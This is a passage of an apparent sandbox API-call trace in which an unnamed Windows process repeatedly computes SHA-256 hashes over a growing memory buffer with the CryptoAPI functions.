	[0119.058] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.058] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0119.058] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe4f0
	[0119.059] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe4f0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe4f0, pdwDataLen=0x12942c) returned 1
	[0119.059] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.059] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.059] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.059] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.059] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0119.059] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe518
	[0119.059] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe518, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe518, pdwDataLen=0x12942c) returned 1
	[0119.059] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.059] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.059] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.059] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.059] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0119.059] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe540
	[0119.060] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe540, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe540, pdwDataLen=0x12942c) returned 1
	[0119.060] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.060] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.060] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.060] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.060] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0119.060] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe568
	[0119.060] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe568, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe568, pdwDataLen=0x12942c) returned 1
	[0119.060] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.060] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.060] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.061] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.061] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0119.061] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe590
	[0119.061] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe590, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe590, pdwDataLen=0x12942c) returned 1
	[0119.061] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.061] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.061] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.061] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.061] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0119.061] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe5b8
	[0119.061] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe5b8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe5b8, pdwDataLen=0x12942c) returned 1
	[0119.061] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.061] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.061] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.062] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.062] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0119.062] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe5e0
	[0119.062] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe5e0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe5e0, pdwDataLen=0x12942c) returned 1
	[0119.062] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.062] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.062] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.062] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.062] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0119.062] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe608
	[0119.062] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe608, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe608, pdwDataLen=0x12942c) returned 1
	[0119.062] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.062] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.062] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.063] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.063] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0119.063] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe630
	[0119.063] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe630, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe630, pdwDataLen=0x12942c) returned 1
	[0119.063] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.063] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.063] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.063] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.063] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0119.063] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe658
	[0119.063] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe658, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe658, pdwDataLen=0x12942c) returned 1
	[0119.063] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.063] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.063] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.064] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.064] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0119.064] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe680
	[0119.064] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe680, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe680, pdwDataLen=0x12942c) returned 1
	[0119.064] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.064] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.064] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.064] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.064] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0119.064] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe6a8
	[0119.064] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe6a8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe6a8, pdwDataLen=0x12942c) returned 1
	[0119.064] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.064] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.064] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.065] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.065] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0119.065] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe6d0
	[0119.065] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe6d0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe6d0, pdwDataLen=0x12942c) returned 1
	[0119.065] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.065] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.065] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.065] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.065] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0119.065] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe6f8
	[0119.065] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe6f8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe6f8, pdwDataLen=0x12942c) returned 1
	[0119.065] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.065] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.065] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.066] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.066] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0119.066] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe720
	[0119.066] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe720, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe720, pdwDataLen=0x12942c) returned 1
	[0119.066] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.066] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.066] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.066] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.066] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0119.066] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe748
	[0119.066] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe748, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe748, pdwDataLen=0x12942c) returned 1
	[0119.066] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.066] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.066] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.067] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.067] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0119.067] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe770
	[0119.067] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe770, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe770, pdwDataLen=0x12942c) returned 1
	[0119.067] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.067] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.067] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.067] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.067] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0119.067] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe798
	[0119.067] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe798, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe798, pdwDataLen=0x12942c) returned 1
	[0119.067] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.067] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.067] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.068] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.068] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0119.068] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe7c0
	[0119.068] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe7c0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe7c0, pdwDataLen=0x12942c) returned 1
	[0119.068] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.068] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.068] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.068] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.068] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0119.068] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe7e8
	[0119.068] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe7e8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe7e8, pdwDataLen=0x12942c) returned 1
	[0119.068] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.068] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.068] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.069] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.069] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0119.069] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe810
	[0119.069] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe810, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe810, pdwDataLen=0x12942c) returned 1
	[0119.069] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.069] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.069] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.069] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.069] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0119.069] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe838
	[0119.069] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe838, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe838, pdwDataLen=0x12942c) returned 1
	[0119.069] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.069] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.069] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.070] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.070] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0119.070] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe860
	[0119.070] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe860, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe860, pdwDataLen=0x12942c) returned 1
	[0119.070] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.070] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.070] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.070] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.070] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0119.070] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe888
	[0119.070] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe888, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe888, pdwDataLen=0x12942c) returned 1
	[0119.070] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.070] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.070] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.071] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.071] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0119.071] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe8b0
	[0119.071] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe8b0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe8b0, pdwDataLen=0x12942c) returned 1
	[0119.071] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.071] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.071] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.072] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.072] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0119.072] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe8d8
	[0119.072] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe8d8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe8d8, pdwDataLen=0x12942c) returned 1
	[0119.072] CryptDestroyHash (hHash=0x22b6600) returned 1
